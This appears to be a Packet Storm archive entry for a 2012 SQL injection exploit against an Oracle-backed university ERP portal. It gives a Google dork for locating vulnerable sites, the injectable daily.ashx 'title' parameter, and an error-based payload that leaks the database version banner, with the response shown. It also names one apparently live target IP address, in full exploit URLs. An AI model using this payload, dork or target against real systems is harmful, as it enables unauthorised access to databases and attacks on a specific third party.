Lucene search

K
packetstormShahram DarvishvandPACKETSTORM:119157
HistoryDec 30, 2012 - 12:00 a.m.

Enterprise Resource Planning SQL Injection

2012-12-3000:00:00
Shahram Darvishvand
packetstormsecurity.com
13
`  
  
# Exploit Author: Shahram Darvishvand [karaji_kt21] <darvishvand.shahram[at]gmail[dot]com>   
# Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]  
# Vendor : sida university system  
# Date: [4/May/2012]  
  
# Google Dork: "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد"   
# Version: [ 1389/09/17 ]  
# Tested on: [ASHX .. Application powered by Oracle DBMS]  
============================================================  
** This Vulnerability Is On version 1389/09/17 **  
--------------------------------------------  
Exploit : http://[IP Or Domain]/Portal/WUC/daily.ashx?title=  
=============================================================  
Example : http://[IP Or Domain]/Portal/WUC/daily.ashx?title=  
'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--  
  
Response :   
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit  
==========================================================  
[+] Greetz : Fahime.Saveh , Behrooz_Ice   
  
  
  
  
********************************  
  
  
For Screen shot 1 :  
  
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--  
  
  
For Screen Shot 2 :  
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--  
`